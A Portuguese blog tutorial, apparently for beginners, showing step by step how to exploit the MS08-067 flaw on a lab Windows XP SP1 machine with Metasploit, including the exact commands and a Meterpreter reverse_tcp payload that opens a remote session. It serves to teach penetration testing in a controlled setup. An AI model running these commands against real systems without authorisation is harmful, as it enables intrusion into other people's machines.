O cenário para este ataque é uma máquina rodando linux com o Metasploit instalado e uma com o Windows XP SP1 vulnerável a MS08_067_netapi.
Com as máquinas na mesma rede, vamos ver o ip de cada uma delas.
Na máquina linux basta dar um ifconfig
Na máquina windows abra uma tela de prompt e de um ipconfig
Agora vamos inicar o Metasploit, dando o comando msfconsole
Como já sabemos qual a vulnerabilidade que vamos explorar, vamos fazer uma busca no Metasploit e descobrir o caminho correto do exploit. Para isso vamos usar o comando search ms08_067_netapi
Pronto, ele nos retornou o caminho, agora vamos selecionar o exploit usando o seguinte comando use exploit/windows/smb/ms08_067_netapi
Vamos agora definir o PAYLOAD que vamos utilizar, neste caso eu vou usar uma conexão reversa então use o comando set PAYLOAD windows/meterpreter/reverse_tcp para definir este PAYLOAD.
Precisamos ver quais parametros nosso exploit vai precisar para atacar a máquina alvo, para isso usaremos o comando show options
Podemos ver claramente na coluna Current Setting que existem dois valores ainda não definidos e que são necessários, que são o RHOST e o LHOST. Vamos definir o LHOST que é nosso IP local, então o comando fica assim set LHOST 10.0.0.7
Para definir o RHOST daremos o seguinte comando set RHOST 10.0.0.8 lembrando que o IP da máquina alvo é 10.0.0.8
Vamos dar novamente o comando show options para ver se ficou faltando algum parametro
Bem como parece estar tudo ok, vamos lançar nosso exploit e ver se da certo. Para isso basta digitar exploit
Show ! Aqui podemos ver que uma sessão foi aberta, isso quer dizer que o alvo foi invadido com sucesso.
Bem esse é o primeiro passo para o estudo do metasploit, será daqui que faremos os ataques mais avançados.
0 comentários:
Postar um comentário